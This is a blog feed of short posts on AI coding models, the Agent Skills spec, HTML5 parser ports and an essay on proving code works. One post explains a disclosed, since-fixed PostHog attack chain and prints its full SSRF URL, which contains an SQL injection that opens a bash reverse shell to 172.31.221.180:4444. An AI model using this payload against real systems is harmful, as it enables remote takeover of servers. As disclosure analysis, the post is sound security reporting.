2025-12-19 13:21:17
The latest in OpenAI's Codex family of models (not the same thing as their Codex CLI or Codex Cloud coding agent tools).
GPT‑5.2-Codex is a version of GPT‑5.2 further optimized for agentic coding in Codex, including improvements on long-horizon work through context compaction, stronger performance on large code changes like refactors and migrations, improved performance in Windows environments, and significantly stronger cybersecurity capabilities.
As with some previous Codex models this one is available via their Codex coding agents now and will be coming to the API "in the coming weeks". Unlike previous models there's a new invite-only preview process for vetted cybersecurity professionals for "more permissive models".
I've been very impressed recently with GPT 5.2's ability to tackle multi-hour agentic coding challenges. 5.2 Codex scores 64% on the Terminal-Bench 2.0 benchmark that GPT-5.2 scored 62.2% on. I'm not sure how concrete that 1.8% improvement will be!
I didn't hack API access together this time (see previous attempts), instead opting to just ask Codex CLI to "Generate an SVG of a pelican riding a bicycle" while running the new model (effort medium). Here's the transcript in my new Codex CLI timeline viewer, and here's the pelican it drew:

Tags: ai, openai, generative-ai, llms, pelican-riding-a-bicycle, llm-release, codex-cli, gpt-codex
2025-12-19 09:09:18
Anthropic have turned their skills mechanism into an "open standard", which I guess means it lives in an independent agentskills/agentskills GitHub repository now? I wouldn't be surprised to see this end up in the AAIF, recently the new home of the MCP specification.
The specification itself lives at agentskills.io/specification, published from docs/specification.mdx in the repo.
It is a deliciously tiny specification - you can read the entire thing in just a few minutes. It's also quite heavily under-specified - for example, there's a metadata field described like this:
Clients can use this to store additional properties not defined by the Agent Skills spec
We recommend making your key names reasonably unique to avoid accidental conflicts
And an allowed-skills field:
Experimental. Support for this field may vary between agent implementations
Example:
allowed-tools: Bash(git:*) Bash(jq:*) Read
The Agent Skills homepage promotes adoption by OpenCode, Cursor,Amp, Letta, goose, GitHub, and VS Code. Notably absent is OpenAI, who are quietly tinkering with skills but don't appear to have formally announced their support just yet.
Tags: ai, generative-ai, llms, anthropic, ai-agents, coding-agents, skills
2025-12-19 07:57:58
First there was Emil Stenström's JustHTML in Python, then my justjshtml in JavaScript, then Anil Madhavapeddy's html5rw in OCaml, and now Kyle Howells has built a vibespiled dependency-free HTML5 parser for Swift using the same coding agent tricks against the html5lib-tests test suite.
Kyle ran some benchmarks to compare the different implementations:
- Rust (html5ever) total parse time: 303 ms
- Swift total parse time: 1313 ms
- JavaScript total parse time: 1035 ms
- Python total parse time: 4189 ms
Tags: html5, ai, generative-ai, llms, ai-assisted-programming, vibe-coding, swift
2025-12-18 22:49:38
In all of the debates about the value of AI-assistance in software development there's one depressing anecdote that I keep on seeing: the junior engineer, empowered by some class of LLM tool, who deposits giant, untested PRs on their coworkers - or open source maintainers - and expects the "code review" process to handle the rest.
This is rude, a waste of other people's time, and is honestly a dereliction of duty as a software developer.
Your job is to deliver code you have proven to work.
As software engineers we don't just crank out code - in fact these days you could argue that's what the LLMs are for. We need to deliver code that works - and we need to include proof that it works as well. Not doing that directly shifts the burden of the actual work to whoever is expected to review our code.
There are two steps to proving a piece of code works. Neither is optional.
The first is manual testing. If you haven't seen the code do the right thing yourself, that code doesn't work. If it does turn out to work, that's honestly just pure chance.
Manual testing skills are genuine skills that you need to develop. You need to be able to get the system into an initial state that demonstrates your change, then exercise the change, then check and demonstrate that it has the desired effect.
If possible I like to reduce these steps to a sequence of terminal commands which I can paste, along with their output, into a comment in the code review. Here's a recent example.
Some changes are harder to demonstrate. It's still your job to demonstrate them! Record a screen capture video and add that to the PR. Show your reviewers that the change you made actually works.
Once you've tested the happy path where everything works you can start trying the edge cases. Manual testing is a skill, and finding the things that break is the next level of that skill that helps define a senior engineer.
The second step in proving a change works is automated testing. This is so much easier now that we have LLM tooling, which means there's no excuse at all for skipping this step.
Your contribution should bundle the change with an automated test that proves the change works. That test should fail if you revert the implementation.
The process for writing a test mirrors that of manual testing: get the system into an initial known state, exercise the change, assert that it worked correctly. Integrating a test harness to productively facilitate this is another key skill worth investing in.
Don't be tempted to skip the manual test because you think the automated test has you covered already! Almost every time I've done this myself I've quickly regretted it.
The most important trend in LLMs in 2025 has been the explosive growth of coding agents - tools like Claude Code and Codex CLI that can actively execute the code they are working on to check that it works and further iterate on any problems.
To master these tools you need to learn how to get them to prove their changes work as well.
This looks exactly the same as the process I described above: they need to be able to manually test their changes as they work, and they need to be able to build automated tests that guarantee the change will continue to work in the future.
Since they're robots, automated tests and manual tests are effectively the same thing.
They do feel a little different though. When I'm working on CLI tools I'll usually teach Claude Code how to run them itself so it can do one-off tests, even though the eventual automated tests will use a system like Click's CLIRunner.
When working on CSS changes I'll often encourage my coding agent to take screenshots when it needs to check if the change it made had the desired effect.
The good news about automated tests is that coding agents need very little encouragement to write them. If your project has tests already most agents will extend that test suite without you even telling them to do so. They'll also reuse patterns from existing tests, so keeping your test code well organized and populated with patterns you like is a great way to help your agent build testing code to your taste.
Developing good taste in testing code is another of those skills that differentiates a senior engineer.
A computer can never be held accountable. That's your job as the human in the loop.
Almost anyone can prompt an LLM to generate a thousand-line patch and submit it for code review. That's no longer valuable. What's valuable is contributing code that is proven to work.
Next time you submit a PR, make sure you've included your evidence that it works as it should.
Tags: programming, careers, ai, generative-ai, llms, ai-assisted-programming, ai-ethics, vibe-coding, coding-agents
2025-12-18 09:42:22
Mehmet Ince describes a very elegant chain of attacks against the PostHog analytics platform, combining several different vulnerabilities (now all reported and fixed) to achieve RCE - Remote Code Execution - against an internal PostgreSQL server.
The way in abuses a webhooks system with non-robust URL validation, setting up a SSRF (Server-Side Request Forgery) attack where the server makes a request against an internal network resource.
Here's the URL that gets injected:
http://clickhouse:8123/?query=SELECT++FROM+postgresql('db:5432','posthog',\"posthog_use'))+TO+STDOUT;END;DROP+TABLE+IF+EXISTS+cmd_exec;CREATE+TABLE+cmd_exec(cmd_output+text);COPY+cmd_exec+FROM+PROGRAM+$$bash+-c+\\"bash+-i+>%26+/dev/tcp/172.31.221.180/4444+0>%261\\"$$;SELECT++FROM+cmd_exec;+--\",'posthog','posthog')#
Reformatted a little for readability:
http://clickhouse:8123/?query=
SELECT *
FROM postgresql(
'db:5432',
'posthog',
"posthog_use')) TO STDOUT;
END;
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec (
cmd_output text
);
COPY cmd_exec
FROM PROGRAM $$
bash -c \"bash -i >& /dev/tcp/172.31.221.180/4444 0>&1\"
$$;
SELECT * FROM cmd_exec;
--",
'posthog',
'posthog'
)
#
This abuses ClickHouse's ability to run its own queries against PostgreSQL using the postgresql() table function, combined with an escaping bug in ClickHouse PostgreSQL function (since fixed). Then that query abuses PostgreSQL's ability to run shell commands via COPY ... FROM PROGRAM.
The bash -c bit is particularly nasty - it opens a reverse shell such that an attacker with a machine at that IP address listening on port 4444 will receive a connection from the PostgreSQL server that can then be used to execute arbitrary commands.
Via Hacker News
Tags: postgresql, security, webhooks, clickhouse
2025-12-18 07:23:35
AoAH Day 15: Porting a complete HTML5 parser and browser test suite
Anil Madhavapeddy is running an Advent of Agentic Humps this year, building a new useful OCaml library every day for most of December.Inspired by Emil Stenström's JustHTML and my own coding agent port of that to JavaScript he coined the term vibespiling for AI-powered porting and transpiling of code from one language to another and had a go at building an HTML5 parser in OCaml, resulting in html5rw which passes the same html5lib-tests suite that Emil and myself used for our projects.
Anil's thoughts on the copyright and ethical aspects of this are worth quoting in full:
The question of copyright and licensing is difficult. I definitely did some editing by hand, and a fair bit of prompting that resulted in targeted code edits, but the vast amount of architectural logic came from JustHTML. So I opted to make the LICENSE a joint one with Emil Stenström. I did not follow the transitive dependency through to the Rust one, which I probably should.
I'm also extremely uncertain about every releasing this library to the central opam repository, especially as there are excellent HTML5 parsers already available. I haven't checked if those pass the HTML5 test suite, because this is wandering into the agents vs humans territory that I ruled out in my groundrules. Whether or not this agentic code is better or not is a moot point if releasing it drives away the human maintainers who are the source of creativity in the code!
I decided to credit Emil in the same way for my own vibespiled project.
Via @avsm
Tags: definitions, functional-programming, ai, generative-ai, llms, ai-assisted-programming, ai-ethics, vibe-coding, ocaml